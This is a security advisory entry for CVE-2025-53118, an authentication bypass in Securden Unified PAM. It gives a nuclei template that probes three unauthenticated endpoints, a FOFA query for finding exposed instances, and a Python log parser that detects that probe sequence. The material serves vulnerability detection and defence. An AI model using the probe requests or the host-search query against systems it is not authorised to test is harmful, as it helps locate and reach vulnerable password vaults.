Vulnerability description
An authentication bypass vulnerability exists which allows an unauthenticated attacker to control administrator backup functions, leading to compromise of passwords, secrets, and application session tokens stored by the Unified PAM.
id: CVE-2025-53118

info:
  name: Securden Unified PAM - Authentication Bypass
  author: DhiyaneshDk,pussycat0x,iamnoooob,pdresearch
  severity: critical
  description: |
    An authentication bypass vulnerability exists which allows an unauthenticated attacker to control administrator backup functions, leading to compromise of passwords, secrets, and application session tokens stored by the Unified PAM.
  reference:
    - https://www.rapid7.com/blog/post/securden-unified-pam-multiple-critical-vulnerabilities-fixed/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53118
  metadata:
    verified: true
    max-request: 3
    fofa-query: (icon_hash="1798893256" || icon_hash="-766529773")
  tags: cve,cve2025,securden,pam,auth-bypass

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /thirdparty-access HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
        internal: true

  - raw:
      - |
        GET /get_csrf_token HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'token')
          - contains(content_type, 'application/json')
        condition: and
        internal: true

  - raw:
      - |
        GET /get_date_picker_format HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'current_date')
          - contains(content_type, 'application/json')
        condition: and
# digest: 4a0a004730450220425ddb223c6e6702f52d99bf845d420dedb8de6956db3f1952b92f552f4f4dd0022100ef63b4fd98eeb41aa0501e3aece08c23397bd9c6d04909a53446c713e087249f:922c64590222798bb761d5b6d8e72950
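The template above fingerprints an exposed instance by requesting three paths in sequence (/thirdparty-access, /get_csrf_token, /get_date_picker_format). From the defender's side, that same sequence from a single client in a short window is a useful indicator that the instance is being scanned for this CVE. The following Python is an added example, not part of the nuclei template or of Securden's code: it parses web-server access logs in the common Apache/nginx combined format (an assumption about your log format), groups requests by client address, and reports clients that issued all three probe paths in template order within a 30-second window (an assumed threshold). The log lines embedded below are constructed for illustration.

```python
"""Flag the three-request probe sequence used by the CVE-2025-53118 nuclei
template in web-server access logs.

Added example; it is not part of the nuclei template or the Securden product.
Assumes combined log format and a 30-second grouping window (both assumptions).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Paths requested by the template, in flow order (taken from the template).
PROBE_PATHS = ("/thirdparty-access", "/get_csrf_token", "/get_date_picker_format")
# Three requests from one client within this window count as one probe (assumed value).
WINDOW = timedelta(seconds=30)

# Combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one client runs the full probe, another is normal traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2025:12:00:01 +0000] "GET /thirdparty-access HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2025:12:00:02 +0000] "GET /get_csrf_token HTTP/1.1" 200 48 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2025:12:00:02 +0000] "GET /get_date_picker_format HTTP/1.1" 200 120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2025:12:05:10 +0000] "GET /get_csrf_token HTTP/1.1" 200 48 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2025:12:05:11 +0000] "GET /dashboard HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]  # drop any query string
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def find_probe_sequences(lines):
    """Return a list of (ip, first_ts, last_ts) for every client that requested
    all three probe paths, in template order, within WINDOW."""
    by_ip = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[3] in PROBE_PATHS:
            by_ip[parsed[0]].append(parsed)

    hits = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[1])  # chronological order per client
        idx = 0
        while idx < len(events):
            if events[idx][3] != PROBE_PATHS[0]:
                idx += 1
                continue
            start = last = events[idx][1]
            want = 1  # index of the next path we expect to see
            j = idx + 1
            while j < len(events) and want < len(PROBE_PATHS) \
                    and events[j][1] - start <= WINDOW:
                if events[j][3] == PROBE_PATHS[want]:
                    want += 1
                    last = events[j][1]
                j += 1
            if want == len(PROBE_PATHS):
                hits.append((ip, start, last))
                idx = j  # skip past the matched sequence
            else:
                idx += 1
    return hits


if __name__ == "__main__":
    for ip, first, last in find_probe_sequences(SAMPLE_LOG.splitlines()):
        print(f"probe sequence from {ip} between {first} and {last}")
```

Requiring the sequence to begin with /thirdparty-access and to complete within a tight window keeps ordinary logged-in users, who may legitimately hit /get_csrf_token and /get_date_picker_format during normal use, out of the results; tune WINDOW to your environment and treat a hit as a reason to confirm the instance is patched per the vendor advisory referenced above.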